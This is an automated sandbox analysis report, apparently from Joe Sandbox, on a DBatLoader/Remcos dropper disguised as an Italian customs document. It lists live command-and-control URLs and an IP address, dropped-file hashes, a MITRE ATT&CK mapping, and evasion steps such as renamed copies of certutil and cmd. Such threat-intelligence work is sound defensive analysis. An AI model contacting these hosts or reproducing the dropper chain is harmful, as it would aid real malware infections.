      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4D54A0 wcschr,NetApiBufferFree,DsFreeNameResultW,#13,LocalFree,DsGetDcNameW,#359,#224,#224,DsBindW,#357,DsCrackNamesW,#357,#145,#359,#359,#14,#359,#73,#359,#208,#26,#127,LocalFree,#140,#359,#224,#167,#27,#357,#357,#41,NetApiBufferFree,DsUnBindW,DsFreeNameResultW,#13,LocalFree,6_2_00007FF67C4D54A0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4EE568 #357,LookupAccountSidW,GetLastError,#357,DsGetDcNameW,DsBindW,DsGetDomainControllerInfoW,DsGetDomainControllerInfoW,#357,DsUnBindW,NetApiBufferFree,LocalFree,6_2_00007FF67C4EE568
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4D227C DsGetDcNameW,#357,DsBindW,DsCrackNamesW,#357,#357,#357,#357,#357,LocalAlloc,#359,DsUnBindW,NetApiBufferFree,DsFreeNameResultW,LocalFree,LocalFree,6_2_00007FF67C4D227C

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire Infrastructure2
      Valid Accounts      		2
      Native API      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		2
      Disable or Modify Tools      		OS Credential Dumping1
      System Time Discovery      		Remote Services11
      Archive Collected Data      		3
      Ingress Tool Transfer      		Exfiltration Over Other Network Medium1
      Data Encrypted for Impact
      CredentialsDomainsDefault AccountsScheduled Task/Job2
      Valid Accounts      		2
      Valid Accounts      		1
      Deobfuscate/Decode Files or Information      		LSASS Memory1
      Account Discovery      		Remote Desktop ProtocolData from Removable Media21
      Encrypted Channel      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)21
      Access Token Manipulation      		2
      Obfuscated Files or Information      		Security Account Manager1
      System Network Connections Discovery      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook11
      Process Injection      		1
      Install Root Certificate      		NTDS1
      File and Directory Discovery      		Distributed Component Object ModelInput Capture114
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Timestomp      		LSA Secrets35
      System Information Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain Credentials1
      Query Registry      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items211
      Masquerading      		DCSync231
      Security Software Discovery      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
      Valid Accounts      		Proc Filesystem1
      Virtualization/Sandbox Evasion      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
      Virtualization/Sandbox Evasion      		/etc/passwd and /etc/shadow1
      System Owner/User Discovery      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
      Access Token Manipulation      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd11
      Process Injection      		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562927 Sample: Documentazione_Doganale_ric... Startdate: 26/11/2024 Architecture: WINDOWS Score: 100 35 vandeytas.ru.com 2->35 39 Found malware configuration 2->39 41 Yara detected DBatLoader 2->41 43 C2 URLs / IPs found in malware configuration 2->43 45 3 other signatures 2->45 8 cmd.exe 1 2->8         started        signatures3 process4 process5 10 extrac32.exe 1 8->10         started        14 AnyDesk.PIF 8->14         started        17 alpha.exe 1 8->17         started        19 5 other processes 8->19 dnsIp6 33 C:\Users\Public\alpha.exe, PE32+ 10->33 dropped 51 Drops PE files to the user root directory 10->51 53 Drops or copies certutil.exe with a different name (likely to bypass HIPS) 10->53 55 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 10->55 37 vandeytas.ru.com 50.7.187.218, 443, 49730, 49731 COGENT-174US United States 14->37 57 Multi AV Scanner detection for dropped file 14->57 59 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 14->59 21 kn.exe 3 2 17->21         started        24 kn.exe 2 19->24         started        27 extrac32.exe 1 19->27         started        file7 signatures8 process9 file10 47 Registers a new ROOT certificate 21->47 49 Drops PE files with a suspicious file extension 21->49 29 C:\Users\Public\Libraries\AnyDesk.PIF, PE32 24->29 dropped 31 C:\Users\Public\kn.exe, PE32+ 27->31 dropped signatures11

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Documentazione_Doganale_richieste_di_copia.cmd8%ReversingLabsText.Trojan.Generic

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\Public\Libraries\AnyDesk.PIF68%ReversingLabsWin32.Trojan.Remcos
      C:\Users\Public\alpha.exe0%ReversingLabs
      C:\Users\Public\kn.exe0%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://vandeytas.ru.com/233_Hlvzmhuinffj0%Avira URL Cloudsafe
      https://vandeytas.ru.com/U0%Avira URL Cloudsafe
      https://vandeytas.ru.com/233_Hlvzmhuinffg0%Avira URL Cloudsafe
      https://vandeytas.ru.com/233_HlvzmhuinffLLg0%Avira URL Cloudsafe
      https://vandeytas.ru.com/233_Hlvzmhuinff;0%Avira URL Cloudsafe
      https://vandeytas.ru.com/M0%Avira URL Cloudsafe
      https://vandeytas.ru.com/233_HlvzmhuinffLL0%Avira URL Cloudsafe
      https://vandeytas.ru.com/233_Hlvzmhuinff/0%Avira URL Cloudsafe
      https://vandeytas.ru.com/Qu0%Avira URL Cloudsafe
      https://vandeytas.ru.com/233_Hlvzmhuinffc0%Avira URL Cloudsafe
      https://vandeytas.ru.com/233_Hlvzmhuinffq0%Avira URL Cloudsafe
      https://vandeytas.ru.com/233_Hlvzmhuinff10%Avira URL Cloudsafe
      https://vandeytas.ru.com/233_Hlvzmhuinffv40%Avira URL Cloudsafe
      https://vandeytas.ru.com:443/233_Hlvzmhuinffvandeytas.ru.comvandeytasr0%Avira URL Cloudsafe
      https://vandeytas.ru.com/0%Avira URL Cloudsafe
      https://vandeytas.ru.com/233_HlvzmhuinffL0%Avira URL Cloudsafe
      https://vandeytas.ru.com/50%Avira URL Cloudsafe
      https://vandeytas.ru.com/233_Hlvzmhuinff0%Avira URL Cloudsafe
      https://vandeytas.ru.com/-0%Avira URL Cloudsafe
      https://vandeytas.ru.com/70000%Avira URL Cloudsafe
      https://vandeytas.ru.com/233_HlvzmhuinffY0%Avira URL Cloudsafe
      https://vandeytas.ru.com/233_HlvzmhuinffLLI0%Avira URL Cloudsafe
      https://vandeytas.ru.com/E0%Avira URL Cloudsafe
      https://vandeytas.ru.com:443/233_Hlvzmhuinff0%Avira URL Cloudsafe
      https://vandeytas.ru.com/ww.vU0%Avira URL Cloudsafe
      https://vandeytas.ru.com/233_Hlv0%Avira URL Cloudsafe
      https://vandeytas.ru.com/233_HlvzmhuinffT0%Avira URL Cloudsafe
      https://vandeytas.ru.com/8g0%Avira URL Cloudsafe
      https://vandeytas.ru.com/233_HlvzmhuinffM0%Avira URL Cloudsafe
      https://vandeytas.ru.com/=0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      vandeytas.ru.com
      		50.7.187.218
      		truetrue
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://vandeytas.ru.com/233_Hlvzmhuinfftrue
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEPkn.exe, 00000006.00000000.1699078959.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1702405563.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1704266482.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1716584582.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.drfalse
          		high
          https://login.microsoftonline.com/%s/oauth2/authorizekn.exefalse
            		high
            https://vandeytas.ru.com/233_HlvzmhuinffgAnyDesk.PIF, 00000009.00000002.2940156410.000000000091E000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2916840538.000000000091C000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://vandeytas.ru.com/233_HlvzmhuinffjAnyDesk.PIF, 00000009.00000003.2460677716.0000000000939000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://login.microsoftonline.com/%s/oauth2/tokenkn.exefalse
              		high
              https://vandeytas.ru.com/UAnyDesk.PIF, 00000009.00000003.2026067126.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2048349573.0000000000911000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://vandeytas.ru.com/233_HlvzmhuinffcAnyDesk.PIF, 00000009.00000003.2460677716.0000000000939000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.2940156410.0000000000939000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2048222769.0000000000939000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2136254211.0000000000939000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2504432392.0000000000939000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2308408762.0000000000939000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://vandeytas.ru.com/MAnyDesk.PIF, 00000009.00000003.2354511256.0000000000911000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1782604010.00000000008F7000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://vandeytas.ru.com/QuAnyDesk.PIF, 00000009.00000003.2136254211.0000000000911000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://vandeytas.ru.com/233_HlvzmhuinffLLgAnyDesk.PIF, 00000009.00000002.2940156410.000000000091E000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://vandeytas.ru.com/233_Hlvzmhuinff;AnyDesk.PIF, 00000009.00000002.2940156410.000000000091E000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2916840538.000000000091C000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://enterpriseregistration.windows.net/EnrollmentServer/key/kn.exefalse
                		high
                https://vandeytas.ru.com/233_Hlvzmhuinff/AnyDesk.PIF, 00000009.00000003.2354387925.000000000092C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://vandeytas.ru.com/233_HlvzmhuinffLLAnyDesk.PIF, 00000009.00000003.2308408762.000000000092C000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2354387925.000000000092C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://vandeytas.ru.com/233_Hlvzmhuinff1AnyDesk.PIF, 00000009.00000003.2354387925.000000000092C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://vandeytas.ru.com/233_HlvzmhuinffqAnyDesk.PIF, 00000009.00000003.2765080066.0000000000939000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://vandeytas.ru.com/233_Hlvzmhuinffv4AnyDesk.PIF, 00000009.00000003.2916840538.00000000008E8000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2765080066.00000000008E4000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://vandeytas.ru.com/AnyDesk.PIF, 00000009.00000003.2136254211.0000000000911000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                https://vandeytas.ru.com:443/233_Hlvzmhuinffvandeytas.ru.comvandeytasrAnyDesk.PIF, 00000009.00000003.2916840538.0000000000906000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2612107894.0000000000906000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2765080066.0000000000906000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.2940156410.0000000000906000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2460677716.0000000000905000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatahkn.exe, 00000006.00000000.1699078959.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1702405563.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1704266482.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1716584582.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.drfalse
                  		high
                  https://vandeytas.ru.com/233_HlvzmhuinffLAnyDesk.PIF, 00000009.00000003.1919870551.000000000092C000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://vandeytas.ru.com/5AnyDesk.PIF, 00000009.00000003.2354511256.0000000000911000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://vandeytas.ru.com/uAnyDesk.PIF, 00000009.00000003.2026067126.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1782604010.00000000008F7000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    https://vandeytas.ru.com/-AnyDesk.PIF, 00000009.00000003.2026067126.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2048349573.0000000000911000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2136254211.0000000000911000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://vandeytas.ru.com/mAnyDesk.PIF, 00000009.00000003.2048349573.0000000000911000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2136254211.0000000000911000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svckn.exefalse
                        		high
                        https://vandeytas.ru.com/7000AnyDesk.PIF, 00000009.00000003.2136254211.0000000000911000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://vandeytas.ru.com/233_HlvzmhuinffLLIAnyDesk.PIF, 00000009.00000003.1919870551.000000000092C000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://vandeytas.ru.com/233_HlvzmhuinffYAnyDesk.PIF, 00000009.00000003.1919870551.000000000092C000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1983981138.000000000092C000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://vandeytas.ru.com/EAnyDesk.PIF, 00000009.00000003.2612107894.0000000000911000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://vandeytas.ru.com:443/233_HlvzmhuinffAnyDesk.PIF, 00000009.00000003.2026067126.00000000008FF000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://vandeytas.ru.com/233_HlvzmhuinffMAnyDesk.PIF, 00000009.00000003.2460677716.0000000000939000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2916840538.0000000000939000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2136254211.000000000092C000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.pmail.comAnyDesk.PIF, AnyDesk.PIF, 00000009.00000002.2941867830.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1720468167.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.2957250885.000000007F9FF000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1720758818.000000007F880000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.2942456888.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpfalse
                          		high
                          https://%ws/%ws_%ws_%ws/service.svc/%wskn.exefalse
                            		high
                            https://enterpriseregistration.windows.net/EnrollmentServer/device/kn.exefalse
                              		high
                              https://vandeytas.ru.com/233_HlvAnyDesk.PIF, 00000009.00000002.2956191980.000000002094D000.00000004.00001000.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
                              https://vandeytas.ru.com/ww.vUAnyDesk.PIF, 00000009.00000003.2136254211.0000000000911000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://vandeytas.ru.com/233_HlvzmhuinffTAnyDesk.PIF, 00000009.00000002.2940156410.0000000000939000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2916840538.0000000000939000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://vandeytas.ru.com/8gAnyDesk.PIF, 00000009.00000003.2048349573.0000000000911000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2136254211.0000000000911000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://vandeytas.ru.com/=AnyDesk.PIF, 00000009.00000003.2916840538.0000000000912000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              50.7.187.218
                              		vandeytas.ru.comUnited States
                              		174COGENT-174UStrue

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1562927
                              Start date and time:2024-11-26 09:37:49 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 8m 29s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:16
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:Documentazione_Doganale_richieste_di_copia.cmd
                              Detection:MAL
                              Classification:mal100.bank.troj.evad.winCMD@22/11@1/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 60
                              • Number of non-executed functions: 204
                              Cookbook Comments:
                              • Found application associated with file extension: .cmd

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report creation exceeded maximum time and may have missing disassembly code information.
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                              • Report size getting too big, too many NtOpenFile calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: Documentazione_Doganale_richieste_di_copia.cmd

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              03:38:45API Interceptor56x Sleep call for process: AnyDesk.PIF modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              50.7.187.218orig.eml.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                              • frsdragoz.za.com/OcrwNAZDnF56.bin
                              orig.eml.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                              • frsdragoz.za.com/rXdAJWw196.bin
                              3LxMjr9QIE.exeGet hashmaliciousGuLoaderBrowse
                              • nughtofknifes.sa.com/EXuKqCxfBTYzW21.bin
                              uzFrAkagaX.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                              • fwegwr.mypi.co/VkWGOQHXLDVTaJQLdaFnQRmo158.bin
                              SARAY_RECEIPT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                              • fwegwr.mypi.co/gzkFUeaICJGODOkRr58.bin

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              vandeytas.ru.comAnyDesk.exeGet hashmaliciousDBatLoaderBrowse
                              • 50.7.187.218

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              COGENT-174USfile.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                              • 38.47.233.4
                              AnyDesk.exeGet hashmaliciousDBatLoaderBrowse
                              • 50.7.187.218
                              fbot.sh4.elfGet hashmaliciousMirai, MoobotBrowse
                              • 38.57.189.73
                              fbot.x86.elfGet hashmaliciousMirai, MoobotBrowse
                              • 38.10.97.97
                              fbot.arm7.elfGet hashmaliciousMirai, MoobotBrowse
                              • 154.42.81.20
                              fbot.mips.elfGet hashmaliciousMirai, MoobotBrowse
                              • 38.89.2.58
                              ZwmyzMxFKL.exeGet hashmaliciousBlackMoonBrowse
                              • 206.238.43.118
                              ZwmyzMxFKL.exeGet hashmaliciousBlackMoonBrowse
                              • 206.238.43.118
                              Payment-251124.exeGet hashmaliciousFormBookBrowse
                              • 38.181.21.178
                              la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                              • 154.49.45.52

                              JA3 Fingerprints

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              a0e9f5d64349fb13191bc781f81f42e1Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • 50.7.187.218
                              FHG538JGH835DG86S.docGet hashmaliciousUnknownBrowse
                              • 50.7.187.218
                              RemittanceAdvice35282-17.xll.dllGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • 50.7.187.218
                              file.exeGet hashmaliciousLummaC StealerBrowse
                              • 50.7.187.218
                              file.exeGet hashmaliciousUnknownBrowse
                              • 50.7.187.218
                              EPTMAcgvNZ.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                              • 50.7.187.218
                              AWkpqJMxci.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                              • 50.7.187.218
                              D2pQ4J4GGZ.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                              • 50.7.187.218
                              C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                              • 50.7.187.218
                              2jbMIxCFsK.exeGet hashmaliciousAgentTesla, DBatLoaderBrowse
                              • 50.7.187.218

                              Dropped Files

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              C:\Users\Public\alpha.exeiuhmzvlH.cmdGet hashmaliciousUnknownBrowse
                                USD470900_COPY_800BLHSBC882001.PDF.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                  Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                    Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                      #U00c1raj#U00e1nlat k#U00e9r#U00e9s 12#U00b711#U00b72024#U00b7Pdf.cmdGet hashmaliciousUnknownBrowse
                                        #U00c1raj#U00e1nlat k#U00e9r#U00e9s 06.11.2024.cmdGet hashmaliciousDBatLoader, FormBookBrowse
                                          TZH3Uk8x45.batGet hashmaliciousDBatLoader, PureLog Stealer, XWormBrowse
                                            Payment.cmdGet hashmaliciousAzorult, DBatLoaderBrowse
                                              FACTURA.cmdGet hashmaliciousDBatLoaderBrowse
                                                rPO767575.cmdGet hashmaliciousDBatLoaderBrowse

                                                  Created / dropped Files

                                                  C:\Users\Public\AnyDesk.jpeg

                                                  Download File
                                                  Process:C:\Users\Public\kn.exe
                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):2599938
                                                  Entropy (8bit):3.876063806380312
                                                  Encrypted:false
                                                  SSDEEP:24576:JfAknAtx79WW+D6xeupltkImnd7ewXLSueiC2wq1q4CPcsq8/q7LGtFHaVHtpdMg:F
                                                  MD5:249B8941E9BE56A05F2506BD021F97C0
                                                  SHA1:9719003F93839AA45568CF9AE911DDE3745E1CE6
                                                  SHA-256:43BE45CCA8380F82BFA444FCFC3F36223068F008CF552628CEB26858CEBE8B9B
                                                  SHA-512:420B1741E91984259C8527792E278E9880D842BB27AEED35F16EEACA04F6EA2EC186F3C7273F502CA31B8DB00D5FFA37B6A4E135BC6C57A9B4DEC79E152E7EF8
                                                  Malicious:false
                                                  Preview:4d5a50000200000004000f00ffff0000b80000000000000040001a00000000000000000000000000000000000000000000000000000000000000000000010000ba10000e1fb409cd21b8014ccd219090546869732070726f6772616d206d7573742062652072756e20756e6465722057696e33320d0a243700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000504500004c010900195e422a0000000000000000e0008e810b01021900bc050000160e0000000000acd705000010000000e0050000004000001000000002000004000000000000000400000000000000007014000004000000000000020000000000100000400000000010000010000000000000100000000000000000000000003013005e25000000f01300007800000000000000000000000000000000000000801300d064000000000000000000000000000000000000000000000000000000701300180000000000000000000000000000000000000010371300d00500000000000000000000000000000000000000000000

                                                  C:\Users\Public\Libraries\AnyDesk.PIF

                                                  Download File
                                                  Process:C:\Users\Public\kn.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1299968
                                                  Entropy (8bit):7.222011374672291
                                                  Encrypted:false
                                                  SSDEEP:24576:Ien4s+Jv82wO5m5jAyTgz1Camim9U/ZxvneUy6/1D+TzxF1Yb:IG+cc5z1CadUUXtSTr
                                                  MD5:BCEEA9753420A675AF68CDA43864438E
                                                  SHA1:0823F156DA4F106A26B5738CF9F732D5DD68CDD8
                                                  SHA-256:B6A6A59C8B8387233BE03BB2111830D4E8AAFEC6A62A290090AE75CBFF5736EC
                                                  SHA-512:8DCD35BE032E853BC785615E63993DEB71FA2EF35A20DB9427C2A281F20EA4768B3754B4887D212CC5867EE36E470D47E33A7333CC9CA0A22196FF8371E51490
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 68%
